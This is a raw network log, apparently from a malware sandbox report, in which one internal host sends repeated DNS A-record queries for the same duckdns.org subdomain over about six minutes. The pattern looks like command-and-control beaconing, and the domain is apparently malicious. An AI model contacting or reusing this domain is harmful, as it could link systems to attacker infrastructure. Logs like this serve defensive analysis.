Jul 5, 2024 07:27:01.177186012 CEST	192.168.11.20	1.1.1.1	0x58ec	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:04.195566893 CEST	192.168.11.20	1.1.1.1	0x9a4e	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:06.788978100 CEST	192.168.11.20	1.1.1.1	0x2225	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:06.909369946 CEST	192.168.11.20	1.1.1.1	0x5be2	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:09.178945065 CEST	192.168.11.20	1.1.1.1	0xa759	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:13.349919081 CEST	192.168.11.20	1.1.1.1	0x3a6d	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:13.471371889 CEST	192.168.11.20	1.1.1.1	0xa035	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:17.645929098 CEST	192.168.11.20	1.1.1.1	0x4c97	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:21.816977024 CEST	192.168.11.20	1.1.1.1	0xfa84	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:21.938502073 CEST	192.168.11.20	1.1.1.1	0x47f8	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:26.065880060 CEST	192.168.11.20	1.1.1.1	0xf134	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:30.205653906 CEST	192.168.11.20	1.1.1.1	0x5e0e	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:30.356949091 CEST	192.168.11.20	1.1.1.1	0xe906	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:34.486049891 CEST	192.168.11.20	1.1.1.1	0xfc4f	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:38.641545057 CEST	192.168.11.20	1.1.1.1	0xa35c	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:38.793565035 CEST	192.168.11.20	1.1.1.1	0x9fb4	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:42.921611071 CEST	192.168.11.20	1.1.1.1	0xfb91	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:47.092721939 CEST	192.168.11.20	1.1.1.1	0xf11a	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:47.213579893 CEST	192.168.11.20	1.1.1.1	0x22e3	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:51.076275110 CEST	192.168.11.20	1.1.1.1	0x354c	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:54.435360909 CEST	192.168.11.20	1.1.1.1	0xc3c8	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:54.574064970 CEST	192.168.11.20	1.1.1.1	0xa0cc	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:57.514396906 CEST	192.168.11.20	1.1.1.1	0x1200	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:00.075546980 CEST	192.168.11.20	1.1.1.1	0x3b19	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:00.203062057 CEST	192.168.11.20	1.1.1.1	0x7a7a	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:02.443226099 CEST	192.168.11.20	1.1.1.1	0x6f02	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:04.450004101 CEST	192.168.11.20	1.1.1.1	0x9706	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:04.590970993 CEST	192.168.11.20	1.1.1.1	0xc324	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:06.325480938 CEST	192.168.11.20	1.1.1.1	0x184d	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:07.825994968 CEST	192.168.11.20	1.1.1.1	0xce9d	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:09.177014112 CEST	192.168.11.20	1.1.1.1	0xe7b7	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:09.298749924 CEST	192.168.11.20	1.1.1.1	0x3abc	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:10.472661018 CEST	192.168.11.20	1.1.1.1	0x93f1	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:11.535684109 CEST	192.168.11.20	1.1.1.1	0x5aae	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:12.477794886 CEST	192.168.11.20	1.1.1.1	0x9245	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:13.289719105 CEST	192.168.11.20	1.1.1.1	0x6560	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:17.414041996 CEST	192.168.11.20	1.1.1.1	0x87c1	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:17.535738945 CEST	192.168.11.20	1.1.1.1	0xcb10	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:21.662921906 CEST	192.168.11.20	1.1.1.1	0x11c5	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:25.802687883 CEST	192.168.11.20	1.1.1.1	0x4a3e	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:25.924593925 CEST	192.168.11.20	1.1.1.1	0x200	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:30.051711082 CEST	192.168.11.20	1.1.1.1	0x39ff	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:34.207081079 CEST	192.168.11.20	1.1.1.1	0x8bcf	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:34.364288092 CEST	192.168.11.20	1.1.1.1	0xde50	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:38.502978086 CEST	192.168.11.20	1.1.1.1	0x7e1	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:42.642749071 CEST	192.168.11.20	1.1.1.1	0xe4fe	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:42.762733936 CEST	192.168.11.20	1.1.1.1	0xbb6f	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:46.891971111 CEST	192.168.11.20	1.1.1.1	0x48f9	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:51.016226053 CEST	192.168.11.20	1.1.1.1	0x3ccc	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:51.136846066 CEST	192.168.11.20	1.1.1.1	0x1d00	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:55.264933109 CEST	192.168.11.20	1.1.1.1	0x8ef0	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:55.417047024 CEST	192.168.11.20	1.1.1.1	0xe7ed	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:59.560934067 CEST	192.168.11.20	1.1.1.1	0x1433	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:03.684997082 CEST	192.168.11.20	1.1.1.1	0xcce1	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:03.806469917 CEST	192.168.11.20	1.1.1.1	0x67e8	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:07.934043884 CEST	192.168.11.20	1.1.1.1	0xee67	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:12.058307886 CEST	192.168.11.20	1.1.1.1	0xcc8e	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:12.179800034 CEST	192.168.11.20	1.1.1.1	0x6c9b	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:16.307224035 CEST	192.168.11.20	1.1.1.1	0xc8f9	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:16.429347038 CEST	192.168.11.20	1.1.1.1	0xefd4	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:20.556267977 CEST	192.168.11.20	1.1.1.1	0x4da0	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:24.680347919 CEST	192.168.11.20	1.1.1.1	0x96d6	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:24.801280975 CEST	192.168.11.20	1.1.1.1	0x5ec9	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:28.945240974 CEST	192.168.11.20	1.1.1.1	0xf5a	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:33.069128990 CEST	192.168.11.20	1.1.1.1	0xbc16	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:33.191046953 CEST	192.168.11.20	1.1.1.1	0x46ea	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:37.318317890 CEST	192.168.11.20	1.1.1.1	0x3998	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:37.438713074 CEST	192.168.11.20	1.1.1.1	0xaaeb	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:41.583283901 CEST	192.168.11.20	1.1.1.1	0x5320	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:45.707156897 CEST	192.168.11.20	1.1.1.1	0x6cab	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:45.828180075 CEST	192.168.11.20	1.1.1.1	0x25c9	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:49.956351042 CEST	192.168.11.20	1.1.1.1	0x8f11	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:54.080549955 CEST	192.168.11.20	1.1.1.1	0xdffe	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:54.201030970 CEST	192.168.11.20	1.1.1.1	0xde04	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:58.329286098 CEST	192.168.11.20	1.1.1.1	0x1aa	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:58.450031996 CEST	192.168.11.20	1.1.1.1	0x4418	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:02.578596115 CEST	192.168.11.20	1.1.1.1	0x280d	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:06.702465057 CEST	192.168.11.20	1.1.1.1	0xfb3e	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:06.828092098 CEST	192.168.11.20	1.1.1.1	0x928f	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:10.951648951 CEST	192.168.11.20	1.1.1.1	0x7e39	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:15.075824022 CEST	192.168.11.20	1.1.1.1	0x9f3	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:15.196923971 CEST	192.168.11.20	1.1.1.1	0xba22	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:19.324716091 CEST	192.168.11.20	1.1.1.1	0x8c19	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:19.467308998 CEST	192.168.11.20	1.1.1.1	0x91c	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:23.605125904 CEST	192.168.11.20	1.1.1.1	0xb7c1	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:27.731312990 CEST	192.168.11.20	1.1.1.1	0x72b	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:27.852046013 CEST	192.168.11.20	1.1.1.1	0x77ba	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:31.978163958 CEST	192.168.11.20	1.1.1.1	0xedaf	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:36.102248907 CEST	192.168.11.20	1.1.1.1	0x2b45	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:36.223138094 CEST	192.168.11.20	1.1.1.1	0x3bba	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:40.351392031 CEST	192.168.11.20	1.1.1.1	0x2b30	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:40.471816063 CEST	192.168.11.20	1.1.1.1	0x2426	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:44.600617886 CEST	192.168.11.20	1.1.1.1	0xd793	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:48.724997997 CEST	192.168.11.20	1.1.1.1	0x1662	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:48.845848083 CEST	192.168.11.20	1.1.1.1	0x4e63	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:52.973571062 CEST	192.168.11.20	1.1.1.1	0x730d	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:57.097762108 CEST	192.168.11.20	1.1.1.1	0xbd9b	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:57.218034983 CEST	192.168.11.20	1.1.1.1	0xb1b3	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:01.346761942 CEST	192.168.11.20	1.1.1.1	0xf348	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:01.467026949 CEST	192.168.11.20	1.1.1.1	0x6a30	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:05.595834970 CEST	192.168.11.20	1.1.1.1	0xec6c	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:09.719978094 CEST	192.168.11.20	1.1.1.1	0xdf98	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:09.871073008 CEST	192.168.11.20	1.1.1.1	0xbd35	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:14.000277996 CEST	192.168.11.20	1.1.1.1	0xf38f	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:18.124366045 CEST	192.168.11.20	1.1.1.1	0xf9b5	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:18.247915983 CEST	192.168.11.20	1.1.1.1	0x43c3	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:22.373657942 CEST	192.168.11.20	1.1.1.1	0x3bde	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:26.497694969 CEST	192.168.11.20	1.1.1.1	0xa4bc	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:26.625643015 CEST	192.168.11.20	1.1.1.1	0x1fc2	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:30.762202978 CEST	192.168.11.20	1.1.1.1	0x7287	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:34.886457920 CEST	192.168.11.20	1.1.1.1	0xc692	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:35.007153988 CEST	192.168.11.20	1.1.1.1	0x2a41	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:39.135469913 CEST	192.168.11.20	1.1.1.1	0xe0ca	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:39.258922100 CEST	192.168.11.20	1.1.1.1	0xabbe	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:43.384486914 CEST	192.168.11.20	1.1.1.1	0x5126	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:47.508517027 CEST	192.168.11.20	1.1.1.1	0xb4fb	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:47.628586054 CEST	192.168.11.20	1.1.1.1	0xe49b	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:51.757656097 CEST	192.168.11.20	1.1.1.1	0x1f77	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:55.897947073 CEST	192.168.11.20	1.1.1.1	0x9a44	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:56.023582935 CEST	192.168.11.20	1.1.1.1	0x1d8f	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:00.146457911 CEST	192.168.11.20	1.1.1.1	0xb18c	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:00.266660929 CEST	192.168.11.20	1.1.1.1	0x987	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:04.395394087 CEST	192.168.11.20	1.1.1.1	0xf409	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:08.519547939 CEST	192.168.11.20	1.1.1.1	0x8a1c	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:08.639723063 CEST	192.168.11.20	1.1.1.1	0xb7ed	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:12.768580914 CEST	192.168.11.20	1.1.1.1	0xd9ff	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:16.908322096 CEST	192.168.11.20	1.1.1.1	0xd7c7	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:17.028665066 CEST	192.168.11.20	1.1.1.1	0x819a	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:21.157521009 CEST	192.168.11.20	1.1.1.1	0x1f6f	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:21.289329052 CEST	192.168.11.20	1.1.1.1	0x1fb3	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:25.422256947 CEST	192.168.11.20	1.1.1.1	0x7bd6	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:29.577725887 CEST	192.168.11.20	1.1.1.1	0x5f10	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:29.699894905 CEST	192.168.11.20	1.1.1.1	0x576d	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:33.826432943 CEST	192.168.11.20	1.1.1.1	0xac6f	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:37.950609922 CEST	192.168.11.20	1.1.1.1	0xeb4d	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:38.071526051 CEST	192.168.11.20	1.1.1.1	0x83d6	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:42.199660063 CEST	192.168.11.20	1.1.1.1	0x2e3f	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:42.321212053 CEST	192.168.11.20	1.1.1.1	0x34e1	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:46.448812008 CEST	192.168.11.20	1.1.1.1	0x2693	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:50.572812080 CEST	192.168.11.20	1.1.1.1	0xa748	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:50.693963051 CEST	192.168.11.20	1.1.1.1	0x628e	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:54.821876049 CEST	192.168.11.20	1.1.1.1	0x4e3f	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:58.946048975 CEST	192.168.11.20	1.1.1.1	0x7695	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:59.067179918 CEST	192.168.11.20	1.1.1.1	0xcae0	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:03.195039988 CEST	192.168.11.20	1.1.1.1	0xa50e	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:03.315498114 CEST	192.168.11.20	1.1.1.1	0xea81	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:07.444237947 CEST	192.168.11.20	1.1.1.1	0xbae4	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:11.584048033 CEST	192.168.11.20	1.1.1.1	0x48ec	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:11.705209970 CEST	192.168.11.20	1.1.1.1	0xceb9	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:15.833075047 CEST	192.168.11.20	1.1.1.1	0x7b3b	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:19.959687948 CEST	192.168.11.20	1.1.1.1	0x8a42	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:20.079838037 CEST	192.168.11.20	1.1.1.1	0x2637	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:24.206208944 CEST	192.168.11.20	1.1.1.1	0xc014	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:24.330660105 CEST	192.168.11.20	1.1.1.1	0xee0	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:28.486810923 CEST	192.168.11.20	1.1.1.1	0x1ea6	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:32.610466957 CEST	192.168.11.20	1.1.1.1	0x9542	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
